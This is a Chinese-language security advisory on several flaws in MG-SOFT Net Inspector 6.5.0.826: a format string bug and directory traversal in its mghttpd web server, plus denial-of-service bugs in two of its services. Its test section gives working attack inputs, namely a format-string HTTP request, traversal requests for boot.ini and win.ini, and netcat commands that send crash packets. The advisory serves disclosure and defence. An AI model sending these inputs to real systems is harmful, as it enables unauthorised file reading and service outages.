BUGTRAQ ID: 28266
CNCAN ID:CNCAN-2008031710

漏洞消息时间:2008-03-17

漏洞起因
设计错误

影响系统
MG-SOFT Net Inspector 6.5.0.826

不受影响系统

危害
远程攻击者可以利用漏洞进行拒绝服务，目录遍历，任意代码执行等攻击。

攻击所需条件
攻击者必须访问MG-SOFT Net Inspector。

漏洞信息
MG-SOFT Net Inspector是一款综合网络管理系统（NMS）应用程序。
MG-SOFT Net Inspector存在多个安全问题，远程攻击者可以利用漏洞进行拒绝服务，目录遍历，任意代码执行等攻击。
-包含的mghttpd在日志处理时存在格式串问题。
-mghttpd存在典型的目录遍历攻击。
-MgWTrap3服务处理特殊报文存在问题，可导致服务崩溃。
-niengine服务程序处理畸形或不完整报文存在拒绝服务攻击。

测试方法
A]
GET /%n%n%s%s%n%n%n%s HTTP/1.0
B]
GET ../../../../boot.ini HTTP/1.0
GET \../..\../..\windows/win.ini HTTP/1.0
C]
echo|nc SERVER PORT -v -v -u
D]
echo -n -e \x2a\x45\x67\xf2\x00\x00\x00\x00|nc SERVER 5221 -v -v -w 1

厂商解决方案
目前没有详细解决方案提供：
http://www.mg-soft.com/netinsp.html

漏洞提供者
Luigi Auriemma

漏洞消息链接
http://aluigi.altervista.org/adv/netinsp-adv.txt

漏洞消息标题
MG-SOFT Net Inspector